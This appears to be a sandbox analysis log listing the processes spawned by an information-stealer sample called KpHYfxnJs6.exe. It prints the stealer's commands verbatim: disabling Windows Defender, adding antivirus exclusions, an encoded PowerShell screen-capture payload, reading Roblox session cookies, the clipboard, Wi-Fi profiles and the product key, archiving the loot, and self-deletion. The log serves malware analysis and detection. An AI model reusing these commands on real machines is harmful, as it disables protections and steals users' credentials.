              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIA
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIAB
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib -r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bifucm0t\bifucm0t.cmdline"
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESED03.tmp" "c:\Users\user\AppData\Local\Temp\bifucm0t\CSCB2EB15F711B84CFFA3556DECAB136738.TMP"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "getmac"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\getmac.exe getmac
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\attrib.exe attrib +r C:\Windows\System32\drivers\etc\hosts
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist /FO LIST
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tree.com tree /A /F
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe C:\Users\user\AppData\Local\Temp\_MEI73202\rar.exe a -r -hp"grabber" "C:\Users\user\AppData\Local\Temp\CoY55.zip" *
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic os get Caption"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic os get Caption
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "ping localhost -n 3 > NUL && del /A H /F "C:\Users\user\Desktop\KpHYfxnJs6.exe""
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping localhost -n 3
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Users\user\Desktop\KpHYfxnJs6.exe "C:\Users\user\Desktop\KpHYfxnJs6.exe"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\KpHYfxnJs6.exe'"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('VERISON NOT SUPPORT (WAIT FOR UPDATE)', 0, 'CLOSING ALL APPS FOR BOTNET', 0+16);close()""Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\user\Desktop\KpHYfxnJs6.exe""Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ ??.scr'"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "tree /A /F"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "systeminfo"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "netsh wlan show profile"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"Jump to behavior
              Source: C:\Users\user\Desktop\KpHYfxnJs6.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAK